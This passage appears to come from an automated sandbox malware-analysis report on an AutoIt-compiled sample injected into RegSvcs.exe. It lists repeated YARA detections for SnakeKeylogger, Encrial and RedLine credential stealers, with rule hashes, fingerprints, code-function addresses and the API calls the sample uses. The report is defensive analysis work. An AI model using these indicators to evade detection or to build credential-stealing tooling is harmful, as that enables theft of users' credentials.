              Source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 2.2.RegSvcs.exe.40de898.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.4777261268.0000000002EB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.4776143140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000000.00000002.2347142574.0000000003150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
              Source: 00000002.00000002.4778477205.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: 00000002.00000002.4777309176.0000000002EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
              Source: 00000002.00000002.4777026209.0000000002B80000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Source: Process Memory Space: RegSvcs.exe PID: 6892, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
              Binary is likely a compiled AutoIt script file
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: This is a third-party compiled AutoIt script.0_2_00303D19
              Source: mnXS9meqtB.exeString found in binary or memory: This is a third-party compiled AutoIt script.
              Source: mnXS9meqtB.exe, 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7194bfb9-3
              Source: mnXS9meqtB.exe, 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: 3SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f1be00a7-c
              Source: mnXS9meqtB.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8952f4c4-9
              Source: mnXS9meqtB.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_d5200829-c
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00346606: CreateFileW,DeviceIoControl,CloseHandle,0_2_00346606
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0033ACC5
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_003479D3
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0032B0430_2_0032B043
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033410F0_2_0033410F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003202A40_2_003202A4
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0030E3B00_2_0030E3B0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033038E0_2_0033038E
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033467F0_2_0033467F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003206D90_2_003206D9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0036AACE0_2_0036AACE
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00334BEF0_2_00334BEF
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0032CCC10_2_0032CCC1
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00306F070_2_00306F07
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0030AF500_2_0030AF50
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031B11F0_2_0031B11F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003631BC0_2_003631BC
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0032D1B90_2_0032D1B9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0032123A0_2_0032123A
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003132000_2_00313200
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0033724D0_2_0033724D
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003093F00_2_003093F0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003413CA0_2_003413CA
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031F5630_2_0031F563
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003096C00_2_003096C0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0034B6CC0_2_0034B6CC
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003077B00_2_003077B0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0036F7FF0_2_0036F7FF
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_003379C90_2_003379C9
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031FA570_2_0031FA57
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00313B700_2_00313B70
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00309B600_2_00309B60
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00307D190_2_00307D19
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_0031FE6F0_2_0031FE6F
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00329ED00_2_00329ED0
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00307FA30_2_00307FA3
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: 0_2_00D47EB00_2_00D47EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00408C602_2_00408C60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0040DC112_2_0040DC11
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00407C3F2_2_00407C3F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00418CCC2_2_00418CCC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00406CA02_2_00406CA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004028B02_2_004028B0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0041A4BE2_2_0041A4BE
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004182442_2_00418244
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004016502_2_00401650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F202_2_00402F20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004193C42_2_004193C4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004187882_2_00418788
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402F892_2_00402F89
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00402B902_2_00402B90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004073A02_2_004073A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02B114372_2_02B11437
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02B114482_2_02B11448
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02B111A82_2_02B111A8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02B111992_2_02B11199
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_02B1116B2_2_02B1116B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_030684382_2_03068438
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_030649502_2_03064950
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_03062F102_2_03062F10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0306EEC82_2_0306EEC8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_030650C82_2_030650C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_030621902_2_03062190
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_03062F012_2_03062F01
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_0306EEBE2_2_0306EEBE
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: String function: 0032F8A0 appears 35 times
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: String function: 00326AC0 appears 42 times
              Source: C:\Users\user\Desktop\mnXS9meqtB.exeCode function: String function: 0031EC2F appears 68 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0040E1D8 appears 44 times
              Source: mnXS9meqtB.exe, 00000000.00000003.2334385755.000000000390D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs mnXS9meqtB.exe
              Source: mnXS9meqtB.exe, 00000000.00000003.2336836817.0000000003763000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs mnXS9meqtB.exe
              Source: mnXS9meqtB.exe, 00000000.00000002.2347142574.0000000003150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs mnXS9meqtB.exe
              Source: mnXS9meqtB.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: 2.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 0.2.mnXS9meqtB.exe.3150000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
              Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40de898.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2ef0000.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2bc1b46.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40b5678.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2eb0000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2eb0000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2ef0000.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40b6560.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2bc1b46.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40b5678.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2eb0ee8.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.40b6560.8.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
              Source: 2.2.RegSvcs.exe.2bc0c5e.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
